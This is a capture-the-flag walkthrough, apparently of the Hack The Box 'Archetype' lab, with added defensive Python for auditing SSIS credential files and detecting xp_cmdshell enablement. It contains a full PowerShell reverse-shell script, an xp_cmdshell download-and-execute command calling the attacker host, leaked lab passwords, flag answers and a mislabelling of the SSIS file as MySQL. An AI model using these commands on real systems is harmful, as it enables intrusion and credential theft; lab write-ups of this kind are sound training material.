# References
- smbclient
- impacket
- github-winPEAS
# Task 1
Q: Which TCP port is hosting a database server?

```
┌──(root💀kali)-[~/桌面]
└─# nmap -sV -Pn 10.129.233.35
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-06 11:29 CST
Nmap scan report for 10.129.233.35
Host is up (0.44s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.51 seconds
```

Port 1433 is open and running an SQL service (Microsoft SQL Server).

A: 1433
# Task 2
Q: What is the name of the non-Administrative share available over SMB?

```
┌──(root💀kali)-[~/桌面]
└─# smbclient -N -L 10.129.233.35                                    1 ⨯

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backups         Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.233.35 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

A: backups
# Task 3
Q: What is the password identified in the file on the SMB share?

```
┌──(root💀kali)-[~/桌面]
└─# smbclient //10.129.233.35/backups
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 20:20:57 2020
  ..                                  D        0  Mon Jan 20 20:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 20:23:02 2020

                5056511 blocks of size 4096. 2609319 blocks available
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit

┌──(root💀kali)-[~/桌面]
└─# cat prod.dtsConfig
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
```

Connect to the backups share, download the config file and read it: it contains a password.

This prod.dtsConfig is presumably a MySQL configuration file, and its original name was probably myconfig.dtsConfig.

A: M3g4c0rp123
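A .dtsConfig file is an SSIS (SQL Server Integration Services) package configuration, and its `ConfiguredValue` here is a connection string with the password stored in clear text. As an added example (not from the original writeup), the audit script below parses such files, flags any connection string that embeds a plaintext `Password`/`Pwd` or keeps `Persist Security Info=True`, and produces a redacted copy safe for a report. The sample XML is constructed to mirror the file above with placeholder credentials.

```python
"""Audit SSIS .dtsConfig files for plaintext credentials in connection strings."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample modelled on the prod.dtsConfig found on the share;
# the account and password below are made-up placeholders.
SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=EXAMPLE_P4ss;User ID=EXAMPLEDOM\svc_acct;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""

SECRET_KEYS = {"password", "pwd"}  # connection-string keys that carry a secret

def split_connection_string(value):
    """Return [(key, val), ...] from 'Key=Val;Key=Val;' keeping original key text."""
    return [tuple(s.strip() for s in part.partition("=")[::2])
            for part in value.split(";") if "=" in part]

def redact(value):
    """Rebuild the connection string with secret values replaced by ***."""
    return ";".join(f"{k}=***" if k.lower() in SECRET_KEYS else f"{k}={v}"
                    for k, v in split_connection_string(value))

@dataclass
class Finding:
    path: str
    user: str
    has_plaintext_password: bool
    persist_security_info: bool
    redacted: str

def audit_dtsconfig(xml_text):
    """One Finding per <Configuration> whose Path targets a ConnectionString."""
    findings = []
    for cfg in ET.fromstring(xml_text).iter("Configuration"):
        path = cfg.get("Path", "")
        if not path.endswith(".Properties[ConnectionString]"):
            continue
        value = (cfg.findtext("ConfiguredValue") or "").strip()
        pairs = {k.lower(): v for k, v in split_connection_string(value)}
        findings.append(Finding(
            path=path,
            user=pairs.get("user id", ""),
            has_plaintext_password=any(k in pairs for k in SECRET_KEYS),
            persist_security_info=pairs.get("persist security info", "").lower() == "true",
            redacted=redact(value)))
    return findings
```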
# Task 4
Q: What script from Impacket collection can be used in order to establish an authenticated connection to a Microsoft SQL Server?

```
┌──(root💀kali)-[~/桌面]
└─# impacket-m
Completing external command
impacket-mimikatz     impacket-mssqlclient
impacket-mqtt_check   impacket-mssqlinstance
```

impacket is a toolkit with a lot in it; a real treasure trove.

A: mssqlclient.py
# Task 5
Q: What extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell?

A: xp_cmdshell
# Task 6
Q: What script can be used in order to search possible paths to escalate privileges on Windows hosts?

This is a privilege-escalation enumeration tool.

A: winPEAS
# Task 7
Q: What file contains the administrator's password?

This asks which file on the SQL host contains the administrator's password. On the target machine the path is `C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt`.

A: ConsoleHost_history.txt
# Task 8
Q: Submit user flag

This asks for the user flag, so we follow the route the tasks have laid out. First, connect to SQL Server with the credentials leaked in Task 3:

```
┌──(root💀kali)-[~/桌面]
└─# impacket-mssqlclient ARCHETYPE/sql_svc@10.129.68.73 -windows-auth
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
```
Check whether the account has sa-level (sysadmin) privileges:

```
SQL> SELECT IS_SRVROLEMEMBER('sysadmin')

-----------
          1
```
It returns 1, so the account is a member of the sysadmin role.

Next, change the server configuration so that SQL Server is allowed to execute operating-system commands:

```sql
EXEC sp_configure 'Show Advanced Options', 1; -- sp_configure is the system stored procedure for server configuration options; setting Show Advanced Options to 1 allows the advanced options to be changed
RECONFIGURE;                                  -- apply the change above
sp_configure;                                 -- show the current sp_configure settings
EXEC sp_configure 'xp_cmdshell', 1;           -- enable xp_cmdshell so SQL Server can run operating-system commands
RECONFIGURE;                                  -- apply the change above
xp_cmdshell "whoami"                          -- run whoami on the target through xp_cmdshell
```
The last command outputs:

```
SQL> xp_cmdshell "whoami"
output
--------------------------------------------------------------------------------
archetype\sql_svc
NULL
```
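Each of the `sp_configure` changes above is recorded in the SQL Server ERRORLOG as a "Configuration option '...' changed from X to Y" message, so the two-step pattern (turn on `show advanced options`, then `xp_cmdshell`) is easy to spot from the server side. As an added example (not part of the original writeup), the detector below parses such log lines and raises an alert whenever a watched option is switched on, marking it as a `sequence` when the same spid enabled advanced options shortly before. The log lines are constructed samples modelled on the real message format, not captured from the box.

```python
"""Detect xp_cmdshell being switched on from SQL Server ERRORLOG lines."""
import re
from datetime import datetime

# Constructed sample ERRORLOG lines (timestamp, spid, message); not from the box.
SAMPLE_ERRORLOG = """\
2022-05-06 13:40:01.12 spid51      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-05-06 13:40:05.33 spid51      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2022-05-06 13:41:10.02 spid51      Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
2022-05-06 14:02:00.00 spid60      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)
# Options that, once non-zero, let SQL Server reach the operating system.
WATCHED = {"xp_cmdshell", "ole automation procedures"}

def parse_config_changes(log_text):
    """Yield one dict per sp_configure change line; unrelated lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S.%f")
            ev["old"], ev["new"] = int(ev["old"]), int(ev["new"])
            yield ev

def detect_xp_cmdshell_enablement(log_text, window_seconds=300):
    """Alert on watched options turned on (old == 0, new != 0). 'sequence' is
    True when the same spid enabled 'show advanced options' within the window,
    which is exactly the two-step sp_configure pattern shown above."""
    alerts, advanced_on = [], {}
    for ev in parse_config_changes(log_text):
        if ev["option"] == "show advanced options" and ev["new"] != 0:
            advanced_on[ev["spid"]] = ev["ts"]
        elif ev["option"] in WATCHED and ev["old"] == 0 and ev["new"] != 0:
            prior = advanced_on.get(ev["spid"])
            seq = prior is not None and (ev["ts"] - prior).total_seconds() <= window_seconds
            alerts.append({"ts": ev["ts"], "spid": ev["spid"],
                           "option": ev["option"], "sequence": seq})
    return alerts

if __name__ == "__main__":
    for alert in detect_xp_cmdshell_enablement(SAMPLE_ERRORLOG):
        print(alert)
```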
At this point we have a partial OS shell. To get a full shell we use a reverse shell. First, create a PowerShell .ps1 script on the attacking machine with the following content:

```powershell
$client = New-Object System.Net.Sockets.TCPClient("内网IP",4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```

This is a reverse connection, so the IP must be your own IP. My file is named shell.ps1.

Then serve it over HTTP with Python:

```
┌──(root💀kali)-[~/桌面]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```
Open a new terminal and start nc listening on 4443:

```
┌──(root💀kali)-[~/桌面]
└─# nc -lvnp 4443
listening on [any] 4443 ...
```

nc options:

- `-l`: listen mode
- `-v`: verbose output
- `-n`: no DNS lookups (do not use this when connecting by hostname)
- `-p`: the port number
Now switch back to the SQL session and run the payload to trigger the reverse connection:

```
SQL> xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.16.86/shell.ps1\");""
output
--------------------------------------------------------------------------------
Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (404) Not Found."
At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.86/a.p ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException
NULL
```
At this point both the HTTP server and nc show activity.

HTTP:

```
┌──(root💀kali)-[~/桌面]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.68.73 - - [06/May/2022 13:49:47] "GET /shell.ps1 HTTP/1.1" 200 -
```

nc:

```
┌──(root💀kali)-[~/桌面]
└─# nc -lvnp 4443
listening on [any] 4443 ...
connect to [10.10.16.86] from (UNKNOWN) [10.129.68.73] 49678
# #
```
Now the user flag can be read through the nc session. At the same time, read the administrator's password in preparation for the next task:

```
# type C:\Users\sql_svc\Desktop\user.txt
3e7b102e78218e935bf3f4951fec21a3
# type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
```

A: 3e7b102e78218e935bf3f4951fec21a3
# Task 9
Q: Submit root flag

We already obtained the administrator's password in the previous task, so we can connect directly and read the flag:

```
┌──(root💀kali)-[~/桌面]
└─# impacket-psexec administrator@10.129.68.73                       1 ⨯
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on 10.129.68.73.....
[*] Found writable share ADMIN$
[*] Uploading file CtOoJpyb.exe
[*] Opening SVCManager on 10.129.68.73.....
[*] Creating service DdAP on 10.129.68.73.....
[*] Starting service DdAP.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```

A shell comes back; all that is left is to read the flag:

```
C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
b91ccec3305e98240082d4474b848528
```

A: b91ccec3305e98240082d4474b848528

Done! Awesome!